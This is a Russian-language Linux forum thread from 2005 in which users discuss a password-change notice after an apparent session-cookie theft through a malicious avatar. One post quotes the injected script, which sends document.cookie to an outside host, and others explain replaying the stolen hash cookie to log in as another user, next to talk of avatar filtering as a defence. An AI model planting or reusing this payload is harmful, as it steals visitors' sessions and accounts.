Смена паролей (официальное объявление)
Модератор: Модераторы разделов
-
alv
- Бывший модератор
- Сообщения: 7275
- Статус: Пенсионер в законе
- ОС: Cintu
Смена паролей
Просьба всем посетителям форума срочно сменить пароли. Причина веская, поверьте.
-
polachok
- Бывший модератор
- Сообщения: 2199
- Статус: главный форумный маргинал
- ОС: gnu/linux
-
alv
- Бывший модератор
- Сообщения: 7275
- Статус: Пенсионер в законе
- ОС: Cintu
Re: Смена паролей
(polachok @ Понедельник, 30 Мая 2005, 17:01) писал(а):веская причина другими словами - это сперли их?
Возможно. Следствие ведут знатоки, к коим себя не причисляю.
-
Sonic
- Сообщения: 478
-
alv
- Бывший модератор
- Сообщения: 7275
- Статус: Пенсионер в законе
- ОС: Cintu
Re: Смена паролей
(Sonic @ Понедельник, 30 Мая 2005, 18:43) писал(а):А подробней?
в модераторском разделе
-
Sonic
- Сообщения: 478
Re: Смена паролей
Да дело ИМХО не в паролях, а в куках, а если так, то, хоть заменяй пароль, хоть нет. Одно и тоже будет.
А пароль ваш не узнают, это точно!
А пароль ваш не узнают, это точно!
LinuxForum.ru :: Форум пользователей ОС Linux
-
VN_MAClover
- Сообщения: 1233
- Статус: Человек с бульвара Капуцинов
Re: Смена паролей
Пароли узнать могут, как-то читал про утилиты, которые позволяют это сделать. Я воспользовался добрым советом и сменил. 
In RMS we trust.
Зачем нам Ваши окна, если LAMPочка даёт достаточно света?
Зачем нам Ваши окна, если LAMPочка даёт достаточно света?
-
t.t
- Бывший модератор
- Сообщения: 7390
- Статус: думающий о вечном
- ОС: Debian, LMDE
Re: Смена паролей
Пока можно сказать только то, что не исключён вариант, что _некоторые_ пароли упёрли. Но на всякий случай...(alv @ Понедельник, 30 Мая 2005, 17:08) писал(а):Возможно. Следствие ведут знатоки, к коим себя не причисляю.
¡иɯʎdʞ ин ʞɐʞ 'ɐнɔɐdʞǝdu qнεиж
-
gray_graff
- Сообщения: 74
- ОС: ALT Linux Sisyphus
Re: Смена паролей
А я в оффлайне тот документик открывал.
Или я не о том?
Или я не о том?
-
Kit Fisto
- Бывший модератор
- Сообщения: 220
Re: Смена паролей
Не мог зайти под своим логином. Воспользовался востановлением пароля.
-
serg_sk
- Бывший модератор
- Сообщения: 2749
- Статус: <3 Anime
- ОС: Gentoo Linux <3
-
Xenon
- Бывший модератор
- Сообщения: 359
- ОС: Debian
Re: Смена паролей
А я картинки не видел.
-
valeri_ufo
- Бывший модератор
- Сообщения: 274
- Статус: Everywhere, yet nowhere
Re: Смена паролей
-
demongloom
- Сообщения: 454
- Статус: Добрый Демон
Re: Смена паролей
ну мой пароль он только на лин форуме юзается. в основном юзаю qazwsx для быстрой регистрации на всяких сайтах. ну а в других нужных местах уже другой стоит :devil_2: .
Если жизнь твоя порвется, тебе новую сошьют.
-
Sonic
- Сообщения: 478
-
Lindemidux
- Сообщения: 50
Re: Смена паролей
Я сохранил картинку аватара Linuxlamer`a.
Там был скрипт отсылки хэшей с паролями на сниффер flood3r.com/hack/sn_1/log.php
Ваши пароли даже не потребовалось бы расшифровывать, надо только Cookie создать.
Надо просто поменять Member ID
А также не использовать пароли, короче 8 символов. И желательно Буквенно-цифренные.
Lindemidux добавил в 31.05.2005 09:20
Содержимое Jpeg эксплойта:
"<script>img = new Image();
img.src = "http://flood3r.com/hack/sn_1/me.jpg?"+document.cookie;</script>"
Там был скрипт отсылки хэшей с паролями на сниффер flood3r.com/hack/sn_1/log.php
Ваши пароли даже не потребовалось бы расшифровывать, надо только Cookie создать.
Надо просто поменять Member ID
А также не использовать пароли, короче 8 символов. И желательно Буквенно-цифренные.
Lindemidux добавил в 31.05.2005 09:20
Содержимое Jpeg эксплойта:
"<script>img = new Image();
img.src = "http://flood3r.com/hack/sn_1/me.jpg?"+document.cookie;</script>"
-
serg_sk
- Бывший модератор
- Сообщения: 2749
- Статус: <3 Anime
- ОС: Gentoo Linux <3
Re: Смена паролей
Для Lindemidux:
Тоесть? Значит порало более восьми символов, сий эксплоит не мог умыкнуть?
Тоесть? Значит порало более восьми символов, сий эксплоит не мог умыкнуть?
-
TIM
- Сообщения: 91
- ОС: FreeBSD
Re: Смена паролей
ага ... а потом хэши и результаты работы Джонни вывесят где-нибудь в инете 
(такой инцидент, не так давно, имел место быть на bsdportal.ru - мы тогда чуть одного нашего админа не потеряли ...)
Внимание!! Пожалуйста, отнеситесь серьёзнее к смене паролей - а то потом будет уже поздно !
(такой инцидент, не так давно, имел место быть на bsdportal.ru - мы тогда чуть одного нашего админа не потеряли ...)
Внимание!! Пожалуйста, отнеситесь серьёзнее к смене паролей - а то потом будет уже поздно !
-
zenwolf
- Бывший модератор
- Сообщения: 3139
- Статус: Страшный и злой
- ОС: Slackware..Salix..x86_64
Re: Смена паролей
я тоже призываю к смене паролей ,это очень СЕРЬЁЗНО ,посмотрите на пос СПЕЦИАЛИСТА - TIM -а.
Ослик_Иа ,а ты чего молчишь ?
Ослик_Иа ,а ты чего молчишь ?
Quae videmus quo dependet vultus. (лат) - То, что мы видим, зависит от того, куда мы смотрим.
-
Sonic
- Сообщения: 478
Re: Смена паролей
Не понял. А какая разница в длине пароля? Если он шифруется в хеш длиной 32 символа.
LinuxForum.ru :: Форум пользователей ОС Linux
-
Topper
- Бывший модератор
- Сообщения: 2088
- Статус: Насильник бабушек-педофилок
- ОС: Windows 10
-
bogus
- Сообщения: 160
Re: Смена паролей
а как IPB формирует этот хэш? Что-то мне подсказывает, что он использует не чистый пароль, а с какой-то секретной добавкой...
bogus добавил в 31.05.2005 10:56
Разница в том, что короткий пароль проще подобрать.
bogus добавил в 31.05.2005 11:15
А защита, кстати говоря, видимо простая: надо жестче фильтровать код для аватаров. Или вообще разрешить использовать только картинки, загруженные сюда.
bogus добавил в 31.05.2005 10:56
(Sonic @ Вторник, 31 Мая 2005, 9:07) писал(а):Не понял. А какая разница в длине пароля? Если он шифруется в хеш длиной 32 символа.
Разница в том, что короткий пароль проще подобрать.
bogus добавил в 31.05.2005 11:15
А защита, кстати говоря, видимо простая: надо жестче фильтровать код для аватаров. Или вообще разрешить использовать только картинки, загруженные сюда.
Как всякое несовершенное существо я могу ошибаться. Простите меня.
jabberId = foldl (flip (:)) [] "ur.rebbaj@43sugob"
jabberId = foldl (flip (:)) [] "ur.rebbaj@43sugob"
-
Topper
- Бывший модератор
- Сообщения: 2088
- Статус: Насильник бабушек-педофилок
- ОС: Windows 10
-
Lindemidux
- Сообщения: 50
Re: Смена паролей
Чтобы зайти под чужим ником надо всего лишь навсего создать Cookie с вашим хэшэм.
Длинный пароль - это чтоб его нельзя было расшифровать и использовать в других местах.
Длинный пароль - это чтоб его нельзя было расшифровать и использовать в других местах.
-
clx
- Сообщения: 3121
- Статус: Think Different !
- ОС: Mac OS X
-
t.t
- Бывший модератор
- Сообщения: 7390
- Статус: думающий о вечном
- ОС: Debian, LMDE
Re: Смена паролей
При чём здесь длина? Если куку упёрли, то там уже готовый хеш лежит.(clx @ Вторник, 31 Мая 2005, 14:49) писал(а):/me использует длинный пароль и не собирается его менять
¡иɯʎdʞ ин ʞɐʞ 'ɐнɔɐdʞǝdu qнεиж
-
Lindemidux
- Сообщения: 50
Re: Смена паролей
Для Bogus:
Надо все существующие аватары отконвертировать в GIF, а новичкам разрешить ставить только GIF.
Надо все существующие аватары отконвертировать в GIF, а новичкам разрешить ставить только GIF.
-
zenwolf
- Бывший модератор
- Сообщения: 3139
- Статус: Страшный и злой
- ОС: Slackware..Salix..x86_64
Re: Смена паролей
ой не не думайте только что написанно одним челом не может быть взломано другим .
Quae videmus quo dependet vultus. (лат) - То, что мы видим, зависит от того, куда мы смотрим.
-
valeri_ufo
- Бывший модератор
- Сообщения: 274
- Статус: Everywhere, yet nowhere
Re: Смена паролей
а вот что важней другим, секюрити форума или ваша аватара ?
мне секюрити ...
-
Nick S. Grechukh
- Сообщения: 108
Re: Смена паролей
(t.t @ Вторник, 31 Мая 2005, 14:57) писал(а):При чём здесь длина? Если куку упёрли, то там уже готовый хеш лежит.
что будет если в хэш еще включать ip?
ALT Linux Sisyphus 2.6.11-std26-up-alt6 KDE 3.4
В действительности все обстоит совершенно иначе, чем на самом деле...
В действительности все обстоит совершенно иначе, чем на самом деле...